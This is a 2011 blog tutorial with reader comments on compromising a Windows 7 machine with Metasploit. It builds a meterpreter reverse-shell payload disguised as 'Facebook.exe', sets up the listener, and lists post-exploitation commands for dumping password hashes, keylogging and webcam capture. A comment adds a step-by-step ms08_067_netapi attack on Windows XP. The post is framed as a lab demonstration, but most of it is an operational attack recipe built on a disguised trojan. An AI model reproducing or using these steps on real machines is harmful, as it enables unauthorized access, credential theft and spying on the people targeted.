Saturday, 10 December 2011

Exploiting Windows 7 with Metasploit/BackTrack 5

So I'm going to take some time to show you how to exploit a Windows 7 machine using Metasploit. Please note that this is just a simple demonstration and as such, my victim PC has Windows Firewall disabled and no Anti Virus in place. Both of these measures would easily prevent this exploit from taking place. I am also assuming that you've already got network connectivity between the victim and the hacker. Here are the details of my setup:

Victim PC = My host machine running Windows 7
Victim PC IP address =

Hacker PC = VMWare Workstation running a BackTrack 5 virtual machine
Hacker PC IP address =

To get started, we're going to open up a terminal in Back Track and navigate to the Metasploit directory. The command to do this is cd /opt/framework/msf3

Next we're going to create our payload and export it into an .exe file that we will use to make the connection between the hacker and victim. The command to create the payload is ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 x > /root/Desktop/Facebook.exe

Note: in this command you will replace the address of MY hacker PC ( with the address of YOUR hacker PC. Leave everything else the same

This command will create the file called Facebook.exe and place it on the Desktop of our Back Track VM. In a real life scenario at this point you'd have to figure out a way to get that file onto the victim's PC and get them to run it. However in this case I'm just going to drag the file out of my virtual machine and onto the desktop of my host machine (DO NOT RUN Facebook.exe YET!) You should be at this point now:

So now the setup phase is done - we've created our payload, figured out a way to get the file onto the victim's computer and now we are ready for the actual exploit to take place.

At this point you're going to use the command ./msfconsole to launch Metasploit. This may take a while to load especially if it's your first time launching the program. After Metasploit launches you should see a screen similar to this:

Now we're going to type the command use exploit/multi/handler and press Enter. Then we will type set LHOST and press Enter. Then type set LHOST 4444 and press Enter. Again, remember to change the address to match that of your OWN hacker PC, leave the port number the same.

Now if you type the command exploit and press enter, Metasploit will launch the payload handler. What this does is opens up a connection to our hacker machine on port 4444, and awaits a connection from the victim's PC (which is created when they open the Facebook.exe file).

So at this point your screen should look like this:

Now the fun begins...if you now double-click on the Facebook.exe file we copied to the Windows 7 victim PC, the payload handler in Metasploit will receive the connection and connect you to the victim PC. You should see something like this:

You now have a Meterpreter prompt which essentially gives you control of the victim's machine. You can issue the command help at the Meterpreter prompt for a list of some of the cool things you can do to the victim but here is a list of the more common ones:

sysinfo - get basic system info
hashdump - dumps the SAM database
screenshot - takes a screenshot of the victims desktop
webcam_snap - takes a web-cam shot of the victims desktop
keyscan_start - start key-logging
keyscan_dump - dump the keystrokes (after using keyscan_start)
ps - list all running processes
shell - gives you a command shell to the victims PC

So that's pretty much it...this is just one of the many ways to exploit a machine using Metasploit. Let me know if you have any questions or commentss


  1. cd /opt/framework/msf3 (No Such file or Directory)
    what do?

  2. Make sure your running backtrack or have Metasploit installed and update to with all frameworks added to the list
    msf > version
    Framework: 4.1.1-release.14072
    Console : 4.1.1-release.14065
    msf >

  3. what are the widgets that you have going in the lower right corner of BT?

  4. If something can't be found, just open the Terminal Prompt, type in Locate [SearchString] and hit ENTER.

    [Replace with your search query]

    Example : Locate msfconsole

    P/S : Linux is made up based on file system. It's easier to run command by looking the file itself and open the directory of the file. Click the program file to run it. Or by just typing it in Terminal. All system files and program files (just like Microsoft ProgramFiles) are stored in /usr/bin directory. :P

  5. I am succsfuly hacked windows 2003 Srver machine but i cant hack windows xp,vista,winbdows 7 psl help me guyz

  6. use netapi vulnarebility to hack windows xp.....
    step 1: msfconsole
    step 2: search netapi
    step 3: use the vulnarability ms08_067_netapi from the list
    step 4: set LHOST [ your local ip address of backtrack machine]
    step 5: set RHOST [ip of target xp machine]
    step 6: set PAYLOAD windows/meterpreter/reverse_tcp
    step 7: exploit

    hence you get the meterpreter session of the victim... enjoy... ;)

  7. shows how good an antivirus is to have! Nice preview!

  8. I have a question. So if you gained access to a computer (in my case, my virtual machine windows 7), can you regain access whenever without having to re-click on the Facebook.exe?

  9. hi..Im student from Informatics engineering, this article is very informative, thanks for sharing :)

  10. is that possible to do that with a virtual machine ? because after do "exploit", no session is created (or found) is write... pleaze help

  11. Verified Computer Hacking Method................

  12. how can i setup this payload to make it work remotely?

  13. All the characteristics of the modern antivirus are quite similar to other security programs, all they differ are the functions performed by it. If you want to get more interesting details about antivirus security, you may go here.

  14. We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.